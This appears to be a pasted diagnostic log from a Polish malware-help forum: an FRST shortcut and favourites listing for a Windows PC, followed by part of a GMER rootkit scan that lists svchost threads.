ShortcutWithArgument: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WarThunder\WarThunder.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://go.playmmogames.com/aff_c?offer_id=698&aff_id=1034&source=1&click_id=e2fe395430f173bfde38c2993e006e118be6b507


ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\True Key.lnk -> C:\Program Files\Intel Security\True Key\application\truekey.exe (Intel Security) -> --open-source=startmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WildTangent Games App - acer.lnk -> C:\Program Files (x86)\WildTangent Games\App\GameConsole-wt.exe (WildTangent) -> /src gamesmenu /dp ACERdt
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WildTangent Games App - wildgames.lnk -> C:\Program Files (x86)\WildTangent Games\App\GameConsole-wt.exe (WildTangent) -> /src gamesmenu /dp wildgames
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk -> C:\Program Files (x86)\Windows Media Player\wmplayer.exe (Microsoft Corporation) -> /prefetch:1
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Task Manager.lnk -> C:\Windows\System32\Taskmgr.exe (Microsoft® Windows® Operating System) -> /7
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Narzędzia pakietu Microsoft Office 2016\Office 2016 Upload Center.lnk -> C:\Program Files (x86)\Microsoft Office\root\client\AppVLP.exe (Microsoft Corporation) -> "C:\Program Files (x86)\Microsoft Office\Root\Office16\MSOUC.EXE"
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus\McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.523\McUICnt.exe (McAfee, Inc.) -> SecurityScanner.dll
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus\Odinstaluj.lnk -> C:\Program Files\McAfee Security Scan\uninstall.exe (McAfee, Inc.) -> C:\Program Files\McAfee Security Scan\3.11.523\McAfee.ico
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee\McAfee LiveSafe .lnk -> C:\Program Files\Common Files\McAfee\platform\McUICnt.exe (McAfee, Inc.) -> /desktopicon /platui
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\12 Labours of Hercules III Girl Power.lnk -> C:\Program Files (x86)\WildGames\12 Labours of Hercules III Girl Power\12LaboursOfHercules3-WT.exe (WildTangent, Inc.) -> /launchgc /src gamesmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Home Makeover.lnk -> C:\Program Files (x86)\WildGames\Home Makeover\HomeMakeover-WT.exe (WildTangent, Inc.) -> /launchgc /src gamesmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Jewel Match 3.lnk -> C:\Program Files (x86)\WildGames\Jewel Match 3\JewelMatch3-WT.exe (WildTangent, Inc.) -> /launchgc /src gamesmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Jewel Match Snowscapes.lnk -> C:\Program Files (x86)\WildGames\Jewel Match Snowscapes\JMS-WT.exe (WildTangent, Inc.) -> /launchgc /src gamesmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Magic Academy.lnk -> C:\Program Files (x86)\WildGames\Magic Academy\academy-WT.exe (WildTangent, Inc.) -> /launchgc /src gamesmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Polar Bowler 1st Frame.lnk -> C:\Program Files (x86)\WildGames\Polar Bowler 1st Frame\PBFF-WT.exe (WildTangent, Inc.) -> /launchgc /src gamesmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Rory's Restaurant.lnk -> C:\Program Files (x86)\WildGames\Rorys Restaurant\RorysRestaurant-WT.exe (WildTangent, Inc.) -> /launchgc /src gamesmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Runefall.lnk -> C:\Program Files (x86)\WildGames\Runefall\Runefall-WT.exe (WildTangent, Inc.) -> /launchgc /src gamesmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Vegas World.lnk -> C:\Program Files (x86)\WildTangent Games\Web Link - Vegas World\launcher.exe (WildTangent) -> /src gamesmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Villagers and Heroes.lnk -> C:\Program Files (x86)\WildTangent Games\Web Link - Villagers and Heroes\launcher.exe (WildTangent) -> /src gamesmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\WildTangent Games App - acer.lnk -> C:\Program Files (x86)\WildTangent Games\App\GameConsole-wt.exe (WildTangent) -> /src gamesmenu /dp ACERdt
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\WildTangent Games App - wildgames.lnk -> C:\Program Files (x86)\WildTangent Games\App\GameConsole-wt.exe (WildTangent) -> /src gamesmenu /dp wildgames
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk -> C:\Windows\System32\compmgmt.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Event Viewer.lnk -> C:\Windows\System32\eventvwr.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Performance Monitor.lnk -> C:\Windows\System32\perfmon.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Resource Monitor.lnk -> C:\Windows\System32\perfmon.exe (Microsoft Corporation) -> /res
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Task Scheduler.lnk -> C:\Windows\System32\taskschd.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer\abFiles.lnk -> C:\Program Files (x86)\Acer\abFiles\abFilesTrayIcon.exe (acer) -> 
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer\Acer Recovery Management.lnk -> C:\Program Files (x86)\Acer\Care Center\CareCenter.exe () -> eRecovery
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer\Dokumenty Acer.lnk -> C:\OEM\Preload\Autorun\GUI\Acer User's Manual\00\OnePager.exe () -> /folder
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Media Player.lnk -> C:\Program Files (x86)\Windows Media Player\wmplayer.exe (Microsoft Corporation) -> /prefetch:1
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\Speech Recognition.lnk -> C:\Windows\Speech\Common\sapisvr.exe (Microsoft Corporation) -> -SpeechUX
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\GameExplorer\{a4744eb8-e18d-4808-a161-5af6b46992e5}\PlayTasks\0\Rory's Restaurant.lnk -> C:\Program Files (x86)\WildGames\Rorys Restaurant\RorysRestaurant-WT.exe (WildTangent, Inc.) -> /launchgc /src gameexplorer
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\GameExplorer\{922028cd-48ee-4fac-b702-091641a630a3}\PlayTasks\0\Runefall.lnk -> C:\Program Files (x86)\WildGames\Runefall\Runefall-WT.exe (WildTangent, Inc.) -> /launchgc /src gameexplorer
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\GameExplorer\{5efc38bb-2dab-4442-8e97-38975fa121af}\PlayTasks\0\Magic Academy.lnk -> C:\Program Files (x86)\WildGames\Magic Academy\academy-WT.exe (WildTangent, Inc.) -> /launchgc /src gameexplorer
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\GameExplorer\{4ab17087-5348-4a14-8af5-cd43a0707d5f}\PlayTasks\0\Polar Bowler 1st Frame.lnk -> C:\Program Files (x86)\WildGames\Polar Bowler 1st Frame\PBFF-WT.exe (WildTangent, Inc.) -> /launchgc /src gameexplorer
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\GameExplorer\{471351f0-4e8a-47bf-a6b3-3de3c99ae340}\PlayTasks\0\Jewel Match 3.lnk -> C:\Program Files (x86)\WildGames\Jewel Match 3\JewelMatch3-WT.exe (WildTangent, Inc.) -> /launchgc /src gameexplorer
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\GameExplorer\{3e271096-cfd0-4d5e-b718-46848370788b}\PlayTasks\0\Home Makeover.lnk -> C:\Program Files (x86)\WildGames\Home Makeover\HomeMakeover-WT.exe (WildTangent, Inc.) -> /launchgc /src gameexplorer
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\GameExplorer\{366930df-1fad-4379-a989-0dd7f315ad45}\PlayTasks\0\12 Labours of Hercules III Girl Power.lnk -> C:\Program Files (x86)\WildGames\12 Labours of Hercules III Girl Power\12LaboursOfHercules3-WT.exe (WildTangent, Inc.) -> /launchgc /src gameexplorer
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\GameExplorer\{17debf67-d01f-4e9d-9869-a8aa73658458}\PlayTasks\0\Jewel Match Snowscapes.lnk -> C:\Program Files (x86)\WildGames\Jewel Match Snowscapes\JMS-WT.exe (WildTangent, Inc.) -> /launchgc /src gameexplorer
ShortcutWithArgument: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Default Apps.lnk -> C:\Windows\ImmersiveControlPanel\systemsettings.exe (Microsoft Corporation) -> page=SettingsPageAppsDefaults
ShortcutWithArgument: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Devices.lnk -> C:\Windows\ImmersiveControlPanel\systemsettings.exe (Microsoft Corporation) -> page=SettingsPagePCSystemDevices
ShortcutWithArgument: C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk -> C:\Windows\System32\WFS.exe (Microsoft Corporation) -> /SendTo
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\04-1 - Network Connections.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> ::{7007ACC7-3202-11D1-AAD2-00805FC1270E}
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\05 - Device Manager.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.DeviceManager
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\06 - System.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.System
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\08 - Power Options.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.PowerOptions
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\10 - Programs and Features.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.ProgramsAndFeatures
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\1 - Run.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{2559a1f3-21d7-11d4-bdaf-00c04f60b9f0}
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\2 - Search.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{2559a1f8-21d7-11d4-bdaf-00c04f60b9f0}
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\3 - Windows Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{52205fd8-5dfb-447d-801a-d0b52f2e83e1}
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\5 - Task Manager.lnk -> C:\Windows\System32\Taskmgr.exe (Microsoft® Windows® Operating System) -> /0
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\1 - Desktop.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{3080F90D-D7AD-11D9-BD98-0000947B0257}
ShortcutWithArgument: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Default Apps.lnk -> C:\Windows\ImmersiveControlPanel\systemsettings.exe (Microsoft Corporation) -> page=SettingsPageAppsDefaults
ShortcutWithArgument: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Devices.lnk -> C:\Windows\ImmersiveControlPanel\systemsettings.exe (Microsoft Corporation) -> page=SettingsPagePCSystemDevices
ShortcutWithArgument: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk -> C:\Windows\System32\WFS.exe (Microsoft Corporation) -> /SendTo
ShortcutWithArgument: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\04-1 - Network Connections.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> ::{7007ACC7-3202-11D1-AAD2-00805FC1270E}
ShortcutWithArgument: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\05 - Device Manager.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.DeviceManager
ShortcutWithArgument: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\06 - System.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.System
ShortcutWithArgument: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\08 - Power Options.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.PowerOptions
ShortcutWithArgument: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\10 - Programs and Features.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.ProgramsAndFeatures
ShortcutWithArgument: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group2\1 - Run.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{2559a1f3-21d7-11d4-bdaf-00c04f60b9f0}
ShortcutWithArgument: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group2\2 - Search.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{2559a1f8-21d7-11d4-bdaf-00c04f60b9f0}
ShortcutWithArgument: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group2\3 - Windows Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{52205fd8-5dfb-447d-801a-d0b52f2e83e1}
ShortcutWithArgument: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group2\5 - Task Manager.lnk -> C:\Windows\System32\Taskmgr.exe (Microsoft® Windows® Operating System) -> /0
ShortcutWithArgument: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group1\1 - Desktop.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{3080F90D-D7AD-11D9-BD98-0000947B0257}
ShortcutWithArgument: C:\Users\Public\Desktop\Dokumenty Acer.lnk -> C:\OEM\Preload\Autorun\GUI\Acer User's Manual\00\OnePager.exe () -> /folder
ShortcutWithArgument: C:\Users\Public\Desktop\McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.523\McUICnt.exe (McAfee, Inc.) -> SecurityScanner.dll


InternetURL: C:\Users\Default\Favorites\Booking.com.url -> URL: hxxp://www.booking.com/index.html?aid=379334
InternetURL: C:\Users\Default\Favorites\Acer\Acer.url -> URL: hxxp://www.acer.com/
InternetURL: C:\Users\Emil\Favorites\Bing.url -> URL: hxxp://go.microsoft.com/fwlink/p/?LinkId=255142
InternetURL: C:\Users\Emil\Favorites\Booking.com.url -> URL: hxxp://www.booking.com/index.html?aid=379334
InternetURL: C:\Users\Emil\Favorites\Links\ACER Akcesoria.url -> URL: hxxp://go.acer.com/?id=14173&model=Aspire E5-573G
InternetURL: C:\Users\Emil\Favorites\Acer\Acer.url -> URL: hxxp://www.acer.com/
InternetURL: C:\Users\Emil\Downloads\Lennar_Digital_Sylenth1_V2.2.1_Windows_8_Fix_130_Presets\Patch\130 Preset banks for sylenth1\Bantana Audio KSHMR Style Presets\Bantana Audio Website.url -> URL: hxxp://bantanaaudio.com/
InternetURL: C:\Users\Emil\Downloads\Lennar_Digital_Sylenth1_V2.2.1_Windows_8_Fix_130_Presets\Patch\130 Preset banks for sylenth1\Bantana Audio KSHMR Style Presets\Join Our Facebook Groups\Bantana Powered Production.url -> URL: hxxps://www.facebook.com/groups/BantanaAudio/
InternetURL: C:\Users\Emil\Downloads\Lennar_Digital_Sylenth1_V2.2.1_Windows_8_Fix_130_Presets\Patch\130 Preset banks for sylenth1\Bantana Audio KSHMR Style Presets\Join Our Facebook Groups\Deep House Bedroom Producers.url -> URL: hxxps://www.facebook.com/groups/deephousebedroomproducers/
InternetURL: C:\Users\Emil\Downloads\Lennar_Digital_Sylenth1_V2.2.1_Windows_8_Fix_130_Presets\Patch\130 Preset banks for sylenth1\Bantana Audio KSHMR Style Presets\Join Our Facebook Groups\Future Bass Producers Group.url -> URL: hxxps://www.facebook.com/groups/FutureBassBedroomProducers/
InternetURL: C:\Users\Emil\Downloads\Lennar_Digital_Sylenth1_V2.2.1_Windows_8_Fix_130_Presets\Patch\130 Preset banks for sylenth1\Bantana Audio KSHMR Style Presets\Join Our Facebook Groups\Trap and Dubstep Producers Group.url -> URL: hxxps://www.facebook.com/groups/BantanaDubstepProducers/
InternetURL: C:\Users\Emil\Downloads\Lennar_Digital_Sylenth1_V2.2.1_Windows_8_Fix_130_Presets\Patch\130 Preset banks for sylenth1\Bantana Audio KSHMR Style Presets\Join Our Facebook Groups\Tropical House Producers Group.url -> URL: hxxps://www.facebook.com/groups/tropicalhousebedroomproducers/
InternetURL: C:\Users\Emil\Downloads\Lennar_Digital_Sylenth1_V2.2.1_Windows_8_Fix_130_Presets\Patch\130 Preset banks for sylenth1\Bantana Audio KSHMR Style Presets\Follow Us On Soundcloud\Bantana Audio.url -> URL: hxxps://soundcloud.com/bantana
InternetURL: C:\Users\Emil\Downloads\Lennar_Digital_Sylenth1_V2.2.1_Windows_8_Fix_130_Presets\Patch\130 Preset banks for sylenth1\Bantana Audio KSHMR Style Presets\Follow Us On Soundcloud\Bantana Mastering.url -> URL: hxxps://soundcloud.com/bantana-mastering
InternetURL: C:\Users\Emil\Downloads\Lennar_Digital_Sylenth1_V2.2.1_Windows_8_Fix_130_Presets\Patch\130 Preset banks for sylenth1\Bantana Audio KSHMR Style Presets\Follow Us On Soundcloud\Bantana.url -> URL: hxxps://soundcloud.com/bantana_records
InternetURL: C:\Users\Emil\Desktop\Proje\VST\Bantana Audio KSHMR Style Presets\Bantana Audio Website.url -> URL: hxxp://bantanaaudio.com/
InternetURL: C:\Users\Emil\Desktop\Proje\VST\Bantana Audio KSHMR Style Presets\Join Our Facebook Groups\Bantana Powered Production.url -> URL: hxxps://www.facebook.com/groups/BantanaAudio/
InternetURL: C:\Users\Emil\Desktop\Proje\VST\Bantana Audio KSHMR Style Presets\Join Our Facebook Groups\Deep House Bedroom Producers.url -> URL: hxxps://www.facebook.com/groups/deephousebedroomproducers/
InternetURL: C:\Users\Emil\Desktop\Proje\VST\Bantana Audio KSHMR Style Presets\Join Our Facebook Groups\Future Bass Producers Group.url -> URL: hxxps://www.facebook.com/groups/FutureBassBedroomProducers/
InternetURL: C:\Users\Emil\Desktop\Proje\VST\Bantana Audio KSHMR Style Presets\Join Our Facebook Groups\Trap and Dubstep Producers Group.url -> URL: hxxps://www.facebook.com/groups/BantanaDubstepProducers/
InternetURL: C:\Users\Emil\Desktop\Proje\VST\Bantana Audio KSHMR Style Presets\Join Our Facebook Groups\Tropical House Producers Group.url -> URL: hxxps://www.facebook.com/groups/tropicalhousebedroomproducers/
InternetURL: C:\Users\Emil\Desktop\Proje\VST\Bantana Audio KSHMR Style Presets\Follow Us On Soundcloud\Bantana Audio.url -> URL: hxxps://soundcloud.com/bantana
InternetURL: C:\Users\Emil\Desktop\Proje\VST\Bantana Audio KSHMR Style Presets\Follow Us On Soundcloud\Bantana Mastering.url -> URL: hxxps://soundcloud.com/bantana-mastering
InternetURL: C:\Users\Emil\Desktop\Proje\VST\Bantana Audio KSHMR Style Presets\Follow Us On Soundcloud\Bantana.url -> URL: hxxps://soundcloud.com/bantana_records

==================== Koniec  Shortcut.txt =============================


GMER

Kod: Zaznacz wszystko
GMER 2.2.19882 - http://www.gmer.net
Rootkit scan 2017-04-19 21:01:04
Windows 6.2.9200  x64 \Device\Harddisk0\DR0 -> \Device\00000030 TOSHIBA_MQ01ABD100 rev.AX003J 931,51GB
Running: 5ymv7ohx.exe; Driver: C:\Users\Emil\AppData\Local\Temp\kwxyifow.sys


---- User code sections - GMER 2.2 ----

?        C:\WINDOWS\system32\apphelp.dll [12712] entry point in ".rdata" section                                                                      00000000713df7c0

---- Threads - GMER 2.2 ----

Thread   C:\WINDOWS\system32\svchost.exe [912:76]                                                                                                     00007ffd69a3f950
Thread   C:\WINDOWS\system32\svchost.exe [912:84]                                                                                                     00007ffd69a3ed20
Thread   C:\WINDOWS\system32\svchost.exe [912:588]                                                                                                    00007ffd69828ae0
Thread   C:\WINDOWS\System32\svchost.exe [620:9660]                                                                                                   00007ffd374c5b60
Thread   C:\WINDOWS\System32\svchost.exe [620:11324]                                                                                                  00007ffd59c6dbe0
Thread   C:\WINDOWS\System32\svchost.exe [620:11664]                                                                                                  00007ffd59c6dbe0
Thread   C:\WINDOWS\System32\svchost.exe [620:11424]                                                                                                  00007ffd59c6dbe0
Thread   C:\WINDOWS\System32\svchost.exe [620:11392]                                                                                                  00007ffd620b51d0
Thread   C:\WINDOWS\System32\svchost.exe [620:6868]                                                                                                   00007ffd620b72d0
Thread   C:\WINDOWS\System32\svchost.exe [620:9844]                                                                                                   00007ffd620e64e0
Thread   C:\WINDOWS\system32\svchost.exe [416:1992]                                                                                                   00007ffd60be50c0
Thread   C:\WINDOWS\system32\svchost.exe [416:1444]                                                                                                   00007ffd63ff7ac0
Thread   C:\WINDOWS\system32\svchost.exe [416:2052]                                                                                                   00007ffd63ff7ac0
Thread   C:\WINDOWS\system32\svchost.exe [416:2080]                                                                                                   00007ffd5f561040
Thread   C:\WINDOWS\system32\svchost.exe [416:2084]                                                                                                   00007ffd5f6148e0
Thread   C:\WINDOWS\system32\svchost.exe [416:2088]                                                                                                   00007ffd5f6148e0
Thread   C:\WINDOWS\system32\svchost.exe [416:2096]                                                                                                   00007ffd5f541930
Thread   C:\WINDOWS\system32\svchost.exe [416:3104]                                                                                                   00007ffd5b5139b0
Thread   C:\WINDOWS\system32\svchost.exe [416:3552]                                                                                                   00007ffd64891a50
Thread   C:\WINDOWS\system32\svchost.exe [416:4208]                                                                                                   000001b1a02b0c6c
Thread   C:\WINDOWS\system32\svchost.exe [416:4216]                                                                                                   000001b1a02b0c6c
Thread   C:\WINDOWS\system32\svchost.exe [416:4220]                                                                                                   000001b1a02b0c6c
Thread   C:\WINDOWS\system32\svchost.exe [416:4252]                                                                                                   000001b1a02a7378
Thread   C:\WINDOWS\system32\svchost.exe [416:4256]                                                                                                   000001b1a02a7378
Thread   C:\WINDOWS\system32\svchost.exe [416:4300]                                                                                                   00007ffd64952cf0
Thread   C:\WINDOWS\system32\svchost.exe [416:8268]                                                                                                   00007ffd36d0f2b0
Thread   C:\WINDOWS\system32\svchost.exe [416:11248]                                                                                                  00007ffd36cefe40
Thread   C:\WINDOWS\system32\svchost.exe [416:11228]                                                                                                  00007ffd36cefe40
Thread   C:\WINDOWS\system32\svchost.exe [416:11216]                                                                                                  00007ffd36cefe40
Thread   C:\WINDOWS\system32\svchost.exe [416:11236]                                                                                                  00007ffd36cf5ed0
Thread   C:\WINDOWS\system32\svchost.exe [416:11244]                                                                                                  00007ffd36cefe40
Thread   C:\WINDOWS\system32\svchost.exe [416:11224]                                                                                                  00007ffd36cf5ed0
Thread   C:\WINDOWS\system32\svchost.exe [416:3944]                                                                                                   00007ffd63ff7ac0
Thread   C:\WINDOWS\system32\svchost.exe [416:6532]                                                                                                   00007ffd643e50a0
Thread   C:\WINDOWS\system32\svchost.exe [968:1156]                                                                                                   00007ffd685e4260
Thread   C:\WINDOWS\system32\svchost.exe [968:1184]                                                                                                   00007ffd685ebce0
Thread   C:\WINDOWS\system32\svchost.exe [968:1188]                                                                                                   00007ffd685ebce0
Thread   C:\WINDOWS\system32\svchost.exe [968:1208]                                                                                                   00007ffd685ebce0
Thread   C:\WINDOWS\system32\svchost.exe [968:1304]                                                                                                   00007ffd677ca920
Thread   C:\WINDOWS\system32\svchost.exe [968:3624]                                                                                                   00007ffd5a751670
Thread   C:\WINDOWS\system32\svchost.exe [968:7356]                                                                                                   00007ffd54a2ac90
Thread   C:\WINDOWS\system32\svchost.exe [968:10484]                                                                                                  00007ffd54a23590
Thread   C:\WINDOWS\system32\svchost.exe [1168:1520]                                                                                                  00007ffd648da420
Thread   C:\WINDOWS\system32\svchost.exe [1168:1532]                                                                                                  00007ffd648d83a0
Thread   C:\WINDOWS\system32\svchost.exe [1168:1536]                                                                                                  00007ffd648db090
Thread   C:\WINDOWS\system32\svchost.exe [1168:1540]                                                                                                  00007ffd648da9a0
Thread   C:\WINDOWS\system32\svchost.exe [1168:1544]                                                                                                  00007ffd648da770
Thread   C:\WINDOWS\system32\svchost.exe [1168:1584]                                                                                                  00007ffd64a82b40
Thread   C:\WINDOWS\system32\svchost.exe [1168:1588]                                                                                                  00007ffd646303e0
Thread   C:\WINDOWS\system32\svchost.exe [1168:1592]                                                                                                  00007ffd6462fa30
Thread   C:\WINDOWS\system32\svchost.exe [1168:2044]                                                                                                  00007ffd601299e0
Thread   C:\WINDOWS\system32\svchost.exe [1168:1060]                                                                                                  00007ffd64952cf0
Thread   C:\WINDOWS\system32\svchost.exe [1168:3648]                                                                                                  00007ffd648d8b00
Thread   C:\WINDOWS\system32\svchost.exe [1168:5396]                                                                                                  00007ffd64a83c70
Thread   C:\WINDOWS\system32\svchost.exe [1168:6568]                                                                                                  00007ffd61192a20
Thread   C:\WINDOWS\system32\svchost.exe [1168:6572]                                                                                                  00007ffd61192610
Thread   C:\WINDOWS\system32\svchost.exe [1288:1356]                                                                                                  00007ffd69060740
Thread   C:\WINDOWS\system32\svchost.exe [1288:1452]                                                                                                  00007ffd6a546750
Thread   C:\WINDOWS\system32\svchost.exe [1288:2144]                                                                                                  00007ffd6a546750
Thread   C:\WINDOWS\system32\svchost.exe [1288:2160]                                                                                                  00007ffd6a546750
Thread   C:\WINDOWS\system32\svchost.exe [1288:2168]                                                                                                  00007ffd5ddec5a0
Thread   C:\WINDOWS\system32\svchost.exe [1288:2176]                                                                                                  00007ffd5ff56cf0
Thread   C:\WINDOWS\system32\svchost.exe [1288:2368]                                                                                                  00007ffd5ddeeab0
Thread   C:\WINDOWS\system32\svchost.exe [1288:2404]                                                                                                  00007ffd5dded2d0
Thread   C:\WINDOWS\system32\svchost.exe [1288:2408]                                                                                                  00007ffd5ddee100
Thread   C:\WINDOWS\system32\svchost.exe [1288:2724]                                                                                                  00007ffd6438af40
Thread   C:\WINDOWS\system32\svchost.exe [1288:2732]                                                                                                  00007ffd6438ca00
Thread   C:\WINDOWS\system32\svchost.exe [1288:3696]                                                                                                  00007ffd575a1240
Thread   C:\WINDOWS\system32\svchost.exe [1288:3700]                                                                                                  00007ffd593aa3b0
Thread   C:\WINDOWS\system32\svchost.exe [1288:3704]                                                                                                  00007ffd575725e0
Thread   C:\WINDOWS\system32\svchost.exe [1288:5024]                                                                                                  00007ffd4fc63bc0
Thread   C:\WINDOWS\system32\svchost.exe [1288:13236]                                                                                                 00007ffd4fc62080
Thread   C:\WINDOWS\System32\svchost.exe [1360:1472]                                                                                                  00007ffd64b7f050
Thread   C:\WINDOWS\System32\svchost.exe [1360:1772]                                                                                                  00007ffd614dc030
Thread   C:\WINDOWS\System32\svchost.exe [1360:1780]                                                                                                  00007ffd614d7000
Thread   C:\WINDOWS\System32\svchost.exe [1360:1784]                                                                                                  00007ffd614d8370
Thread   C:\WINDOWS\System32\svchost.exe [1360:1788]                                                                                                  00007ffd614dad30
Thread   C:\WINDOWS\System32\svchost.exe [1360:1692]                                                                                                  00007ffd5fc487e0
Thread   C:\WINDOWS\System32\svchost.exe [1360:3520]                                                                                                  00007ffd59c6dbe0
Thread   C:\WINDOWS\System32\svchost.exe [1360:3548]                                                                                                  00007ffd59c6dbe0
Thread   C:\WINDOWS\System32\svchost.exe [1360:3816]                                                                                                  00007ffd614dc830
Thread   C:\WINDOWS\System32\svchost.exe [1360:3836]                                                                                                  00007ffd614d7d50
Thread   C:\WINDOWS\System32\svchost.exe [1360:3532]                                                                                                  00007ffd64a230f0
Thread   C:\WINDOWS\System32\svchost.exe [1360:10072]                                                                                                 00007ffd64362400
Thread   C:\WINDOWS\System32\svchost.exe [1668:1696]                                                                                                  00007ffd62223210
Thread   C:\WINDOWS\System32\svchost.exe [1668:1704]                                                                                                  00007ffd621b3ba0
Thread   C:\WINDOWS\system32\svchost.exe [1764:1844]                                                                                                  00007ffd612bfa00
Thread   C:\WINDOWS\system32\svchost.exe [1764:1852]                                                                                                  00007ffd610a10a0
Thread   C:\WINDOWS\system32\svchost.exe [1764:1244]                                                                                                  00007ffd64952cf0
